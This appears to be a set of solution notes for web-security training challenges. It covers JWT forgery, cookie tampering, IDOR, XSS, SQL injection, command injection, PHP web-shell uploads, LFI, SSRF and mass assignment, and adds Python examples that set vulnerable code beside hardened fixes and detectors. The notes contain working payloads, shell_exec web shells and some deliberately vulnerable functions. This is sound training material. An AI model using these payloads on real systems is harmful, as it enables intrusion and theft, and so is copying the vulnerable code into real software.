Solution Notes TH

1. Several vulnerabilities are demonstrated, including broken authentication, insecure direct object references, cross-site scripting, insecure deserialization, and lack of access control.
2. Methods of exploiting these vulnerabilities are provided, such as bypassing authentication by removing form inputs or guessing default credentials, escalating privileges by modifying cookie values, and extracting sensitive data using SQL injection or server-side request forgery.
3. Users are instructed how to decode and modify JSON web tokens to change user privileges, exploit XXE vulnerabilities in ASP.NET, and forge requests to access administrative interfaces.

Uploaded by sam

Broken Authentication:

Tutorial

Password Recovery:

Enumerate the colours; there is no limit on the number of attempts. The answer is black.

Broken 2FA:

It's not hard to guess the admin password: admin


Use an intercepting proxy, or simply remove the inputs from the page source, then submit the form! Because there are no answers, the "Checking answers" step is skipped and your account is verified. Congratulations, you're admin now!

Hide and Seek:

Try with the link: /users.

Secure Bank:

- Log in with the demo account.
- Click Print.
- Copy the URL from the popup window (https://challengeid.subdomain.avatao-challenge.com/print.php?id=25).
- Keep changing the id until you see your target (Fredrick Ellis).
- Submit his balance as the flag (without the $).

Unsavoury Cookies:

Log in as bob, go to an arbitrary product's page, and open the developer tools (F12 in most browsers). Then check the stored cookies: you will see a cookie named IsModerator with value 0. Set the value to 1 and refresh the page, and tadaaaa: the magical Delete comment button is now under your control. Click it and your flag will appear!

Good Old JWT:

Decode the JWT token.

Update the alg to none.

Change the user to admin and send the request.

Secret Admin:

Register and Login

Select Admin.

Observe the request in Repeater.

Try modifying the JWT token; the application responds with an error.

Run jwtcracker in Kali Linux.

Get the secret (ezpz).

In jwt.io, enter ezpz as the secret and update the role to admin.

Send the request with the updated JWT. Solved!
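
The server-side view of the two JWT challenges above (Good Old JWT and Secret Admin), as an added example that is not part of the original notes: a naive verifier that lets the token header choose the algorithm beside a hardened one that pins HS256, plus a key-length check. The secret ezpz is the page's; everything else is constructed.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"ezpz"  # the page's cracked secret, reused here as the constructed signing key

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(claims: dict, secret: bytes) -> str:
    """Server side: issue a properly signed HS256 token."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(claims).encode())
    mac = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(mac)}"

def unsigned_token(claims: dict) -> str:
    """Test vector: the alg=none token the 'Good Old JWT' step above describes."""
    header = b64url_encode(b'{"alg":"none","typ":"JWT"}')
    return f"{header}.{b64url_encode(json.dumps(claims).encode())}."

def verify_naive(token: str, secret: bytes):
    """Vulnerable: lets the token's own header pick the algorithm, so 'none' skips the MAC entirely."""
    head, body, sig = token.split(".")
    if json.loads(b64url_decode(head)).get("alg", "").lower() == "none":
        return json.loads(b64url_decode(body))
    mac = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return json.loads(b64url_decode(body)) if hmac.compare_digest(mac, b64url_decode(sig)) else None

def verify_strict(token: str, secret: bytes):
    """Hardened: the algorithm is pinned server-side and the MAC is always checked."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    head, body, sig = parts
    if json.loads(b64url_decode(head)).get("alg") != "HS256":
        return None  # 'none', 'None', RS256 and any other header value are refused
    mac = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(mac, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))

def secret_is_strong(secret: bytes) -> bool:
    """RFC 7518 requires HS256 keys of at least 256 bits; a 4-byte secret falls to a wordlist."""
    return len(secret) >= 32
```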

CSRF Adventures:

Tutorial. Stick to issue, don’t go to code remediation.

CSRF Demo:

Check the HTML file and perform a normal CSRF.

Hello Stored XSS

<script>alert(document.cookie)</script>

Reflected XSS

<script>alert('xss')</script>

Cookie Protection in Flask:

Explain why httponly is important
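
Added example (not from the original notes) for the HttpOnly discussion: the Flask session-cookie settings in a weak and a hardened form, the Set-Cookie line each produces, and an audit function that reports which protections a response cookie lacks. The config keys are Flask's real ones; the header renderer is a constructed stand-in, not Flask's code.

```python
from http.cookies import SimpleCookie

# Real Flask config keys. Flask's defaults are HttpOnly on, Secure off, SameSite unset.
WEAK = {"SESSION_COOKIE_HTTPONLY": False, "SESSION_COOKIE_SECURE": False,
        "SESSION_COOKIE_SAMESITE": None}
HARDENED = {"SESSION_COOKIE_HTTPONLY": True, "SESSION_COOKIE_SECURE": True,
            "SESSION_COOKIE_SAMESITE": "Lax"}

def set_cookie_header(name: str, value: str, cfg: dict) -> str:
    """Render the Set-Cookie line a server with this config would emit (constructed, not Flask's own code)."""
    attrs = [f"{name}={value}", "Path=/"]
    if cfg.get("SESSION_COOKIE_HTTPONLY"):
        attrs.append("HttpOnly")
    if cfg.get("SESSION_COOKIE_SAMESITE"):
        attrs.append(f"SameSite={cfg['SESSION_COOKIE_SAMESITE']}")
    if cfg.get("SESSION_COOKIE_SECURE"):
        attrs.append("Secure")
    return "; ".join(attrs)

def missing_protections(header: str) -> list:
    """Audit a Set-Cookie header: which of HttpOnly / Secure / SameSite are absent."""
    jar = SimpleCookie()
    jar.load(header)
    missing = []
    for morsel in jar.values():
        if not morsel["httponly"]:
            # Without HttpOnly, the stored-XSS payload <script>alert(document.cookie)</script>
            # from the section above can read the session cookie.
            missing.append("HttpOnly")
        if not morsel["secure"]:
            missing.append("Secure")
        if not morsel["samesite"]:
            missing.append("SameSite")
    return missing
```

Note that flags do not help the Unsavoury Cookies case: a privilege such as IsModerator must live in server-side session state, never in a value the client can edit.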

AlerThemer

x' onerror='alert(1)' t='

x' onerror='alert(1)'

Injection:

Show by trying aaaa, then aaa'.

Solution: admin' --

Where is my data:

In statican, the keyword parameter is injectable:

' UNION SELECT name, null FROM sqlite_master --

' UNION SELECT username, age FROM user --

I want that password:

Step 1: test--

Step 2: test' UNION SELECT 1,2,3,4,5,6,7,8,9--

Step 3: test' UNION SELECT 1,2,3,4,password,6,7,8,9 FROM Users--

Step 4: test' UNION SELECT 1,2,3,4,password,6,7,8,9 FROM Users WHERE Userid=1--
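
Added example covering the three SQL injection sections above (Injection, Where is my data, I want that password); it is not part of the original notes. An in-memory SQLite table is constructed with placeholder rows, and the string-built login and search are shown beside their parameterised forms so the admin' -- and UNION inputs can be run against both.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge's user table.
    Clear-text passwords only mirror the challenge; a real table stores hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT, age INTEGER)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)",
                     [("admin", "placeholder-admin-pw", 41), ("bob", "bobpass", 23)])
    return conn

def login_vulnerable(conn, username: str, password: str):
    """String-built query: admin' -- closes the quote and comments out the password check."""
    sql = (f"SELECT username FROM user WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username: str, password: str):
    """Bound parameters: the quote and comment sequence are data, never SQL syntax."""
    row = conn.execute("SELECT username FROM user WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None

def search_vulnerable(conn, keyword: str) -> list:
    """The 'Where is my data' shape: a UNION in the keyword reads sqlite_master or other columns."""
    sql = f"SELECT username, age FROM user WHERE username LIKE '%{keyword}%'"
    return conn.execute(sql).fetchall()

def search_parameterized(conn, keyword: str) -> list:
    """Same search with the pattern bound; the UNION text is just characters to match."""
    return conn.execute("SELECT username, age FROM user WHERE username LIKE ?",
                        (f"%{keyword}%",)).fetchall()
```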

Ping the World - Part 1


127.0.0.1
127.0.0.1;id
127.0.0.1;ls
127.0.0.1;cat flag.txt

Ping the World - Part 1.5


127.0.0.1
127.0.0.1;id
127.0.0.1|id
127.0.0.1|ls -la
127.0.0.1|ls -la secret_directory
127.0.0.1|ls -la secret_directory/Right
127.0.0.1|cat secret_directory/Right/flag.txt
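
Added example (not from the original notes) for the two Ping the World sections: the shell string the challenge builds, the validated argv form that never reaches a shell, and a log heuristic for the ; and | probes listed above. The probe list is constructed from the page; ping is assumed to be on PATH when run_ping is called.

```python
import ipaddress
import subprocess

# Constructed inputs mirroring the page's probes.
PROBES = ["127.0.0.1", "127.0.0.1;id", "127.0.0.1|ls -la"]

def shell_command_vulnerable(host: str) -> str:
    """The string the challenge hands to a shell; ';' or '|' ends the ping and starts a new command."""
    return f"ping -c 1 {host}"

def validate_host(host: str) -> str:
    """Accept only a literal IPv4/IPv6 address; raises ValueError for anything else."""
    return str(ipaddress.ip_address(host.strip()))

def is_valid_host(host: str) -> bool:
    try:
        validate_host(host)
        return True
    except ValueError:
        return False

def ping_argv(host: str) -> list:
    """argv for subprocess with shell=False: each element is one argument, never re-parsed by a shell."""
    return ["ping", "-c", "1", validate_host(host)]

def run_ping(host: str, timeout: float = 5.0) -> int:
    """Execute the validated ping; returns the exit status (0 means the host answered)."""
    result = subprocess.run(ping_argv(host), shell=False, capture_output=True,
                            timeout=timeout, check=False)
    return result.returncode

def looks_injected(host: str) -> bool:
    """Detection heuristic for request logs: shell metacharacters inside a host parameter."""
    return any(ch in host for ch in ";|&`$(){}\n")
```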

Local Real Estate Inclusion


Tutorial
Agent name=etc/passwd

Eye Land 1

<?php
print("hello");
?>

<?php
$output = shell_exec('ls -la');
echo "<pre>$output</pre>";
?>

<?php
$output = shell_exec('cat ../../../home/user/flag.txt');
echo "<pre>$output</pre>";
?>

Eye Land 2

<?php
print("hello");
?>

Change content type to image/png and extension to php5


<?php
print("hello");
?>

<?php
$output = shell_exec('find /home/user/*/flag*');
echo "<pre>$output</pre>";
?>

<?php
$output = shell_exec('cat /home/user/bevydrr7x5/flag.txt');
echo "<pre>$output</pre>";
?>
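
Added example (not from the original notes) for the Eye Land uploads: a check that trusts the client's Content-Type, which the image/png + .php5 step above defeats, beside a hardened check built on an extension allowlist, magic bytes and a PHP-tag scan. The allowlist, magic table and sample bytes are constructed.

```python
import os
import secrets

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}  # constructed allowlist; php/php5/phtml are absent
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff",
         ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}
PHP_TAGS = (b"<?php", b"<?=")  # short_open_tag "<?" omitted: it would flag XMP/XML in real images

# Constructed samples: the page's probe script and a minimal PNG signature.
PHP_PROBE = b'<?php print("hello"); ?>'
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8

def accept_vulnerable(content_type: str, filename: str, data: bytes) -> bool:
    """Checks only the client-set Content-Type, so image/png + probe.php5 passes."""
    return content_type.startswith("image/")

def accept_hardened(content_type: str, filename: str, data: bytes) -> bool:
    """Extension allowlist, magic bytes and a PHP-tag scan; Content-Type is untrusted and ignored."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED_EXT:
        return False                       # .php, .php5, .phtml never reach the web root
    if not data.startswith(MAGIC[ext]):
        return False                       # body must really be the image type it claims
    return not any(tag in data for tag in PHP_TAGS)  # rejects GIF/PNG polyglots carrying code

def stored_name(filename: str) -> str:
    """Server-chosen storage name: random token plus validated extension, never the client's name."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    return secrets.token_hex(8) + ext
```

Serve the upload directory with script execution disabled as well; the checks above reduce, but do not replace, that control.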

XXE with ASP.NET

Tutorial (sample files in folder)

SSRF with XXE

Tutorial

Real Estate Request Forgery

Follow the steps: navigate to properties and click on More info.

Intercept the request.

Observe the internal localhost IP.

Change this to 127.0.0.1:9191/admin.

Admin login, wow.
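
Added example (not from the original notes) for the request forgery above: the preferred design where the client sends only a property id and the server builds the backend URL, an allowlist check for endpoints that must accept a URL, and the internal-address test that flags targets like 127.0.0.1:9191/admin. The backend host name is an assumption.

```python
import ipaddress
from urllib.parse import urlparse

BACKEND_HOST = "properties.example.internal"  # assumed name of the legitimate details service

def more_info_url_vulnerable(client_supplied_url: str) -> str:
    """The page's pattern: the server fetches whatever URL the request carries."""
    return client_supplied_url

def is_valid_property_id(property_id: str) -> bool:
    try:
        return int(property_id) > 0
    except ValueError:
        return False  # '127.0.0.1:9191/admin' is not an integer id

def property_info_url(property_id: str) -> str:
    """Preferred fix: the client sends only an id; the server composes the URL itself."""
    if not is_valid_property_id(property_id):
        raise ValueError("bad property id")
    return f"http://{BACKEND_HOST}/info?id={int(property_id)}"

def is_internal_host(host: str) -> bool:
    """Detection/defence: loopback, private, link-local and reserved addresses are internal."""
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname: resolve it and re-check the resulting IP before connecting
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved

def allowed_target(url: str) -> bool:
    """For a legacy endpoint that must take a URL: scheme, host and port are pinned to the backend.
    Also disable redirect following on the outbound client, or a 3xx can step around this."""
    p = urlparse(url)
    return p.scheme == "http" and p.hostname == BACKEND_HOST and p.port in (None, 80)
```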

L1K3 API 1

Monitor your network traffic while liking or disliking posts to get the API URL. Since they call it an API, maybe it's not just for AJAX calls. Visit https://challenge.subdomain.avatao-challenge.com/api/v1/users or https://challenge.subdomain.avatao-challenge.com/api/v1/user/1 and you will find the admin password. Log in with it to get your flag!
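
Added example (not from the original notes) serving the Secure Bank print.php?id= walk and the L1K3 API user endpoint above: object-level authorisation on the statement id, a field allowlist so the user endpoint never serialises the password, and a log count of distinct ids per session to spot enumeration. Records, log lines and the log format are constructed.

```python
from urllib.parse import parse_qs, urlparse

# Constructed records standing in for the bank's statements and the API's user table.
STATEMENTS = {
    25: {"owner": "demo", "holder": "Demo User", "balance": 120},
    26: {"owner": "fellis", "holder": "Fredrick Ellis", "balance": 0},  # placeholder balance
}
USERS = {1: {"id": 1, "username": "admin", "password": "placeholder-hash"}}
PUBLIC_USER_FIELDS = ("id", "username")

# Constructed access log: "<session user> <method> <path>" per line.
SAMPLE_LOG = """demo GET /print.php?id=25
demo GET /print.php?id=26
demo GET /print.php?id=27
alice GET /print.php?id=40"""

def print_statement_vulnerable(session_user: str, statement_id: int):
    """print.php?id=N as the page describes: the id alone selects the record."""
    return STATEMENTS.get(statement_id)

def authorised(session_user: str, statement_id: int) -> bool:
    """Object-level check: the record must exist AND belong to the caller."""
    rec = STATEMENTS.get(statement_id)
    return rec is not None and rec["owner"] == session_user

def print_statement_hardened(session_user: str, statement_id: int):
    if not authorised(session_user, statement_id):
        return None  # same response for missing and foreign ids, so ids cannot be enumerated
    return STATEMENTS[statement_id]

def api_user_view(user_id: int):
    """/api/v1/user/<id>: serialise an allowlist of fields; the password never leaves the server."""
    rec = USERS.get(user_id)
    return None if rec is None else {k: rec[k] for k in PUBLIC_USER_FIELDS}

def ids_probed_per_user(log_text: str) -> dict:
    """Detection: number of distinct id= values each session requested."""
    seen = {}
    for line in log_text.splitlines():
        user, _method, path = line.split(" ", 2)
        for value in parse_qs(urlparse(path).query).get("id", []):
            seen.setdefault(user, set()).add(value)
    return {user: len(ids) for user, ids in seen.items()}
```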

Free Money

Register a normal user account.

Observe the request and response.

Register a new user:

{"name":"hacker","username":"hacker","password":"hacker","address":"hacker", "balance": 99999}
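
Added example (not from the original notes) for Free Money: a registration handler that binds every JSON key onto the account, so the balance in the body above is honoured, beside one that copies only an allowlist of client-settable fields, plus a check that reports server-owned keys arriving in a request body. Field names and defaults are constructed.

```python
import json

REGISTER_FIELDS = ("name", "username", "password", "address")  # the only client-settable fields
SERVER_DEFAULTS = {"balance": 0, "role": "user"}               # server-owned, never from the body

# The page's registration body, used here as the constructed sample input.
SAMPLE_BODY = ('{"name":"hacker","username":"hacker","password":"hacker","address":"hacker",'
               ' "balance": 99999}')

def register_vulnerable(body: str) -> dict:
    """Binds every JSON key onto the new account, so the client's balance overrides the default."""
    account = dict(SERVER_DEFAULTS)
    account.update(json.loads(body))
    return account

def register_hardened(body: str) -> dict:
    """Copies only the allowlisted fields; anything else in the body is ignored."""
    data = json.loads(body)
    account = dict(SERVER_DEFAULTS)
    for field in REGISTER_FIELDS:
        value = data.get(field)
        if not isinstance(value, str) or not value:
            raise ValueError(f"missing or invalid field: {field}")
        account[field] = value
    # A real service would hash the password here before storing the account.
    return account

def unexpected_fields(body: str) -> list:
    """Detection: server-owned keys in a registration body indicate mass-assignment probing."""
    return sorted(set(json.loads(body)) - set(REGISTER_FIELDS))
```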
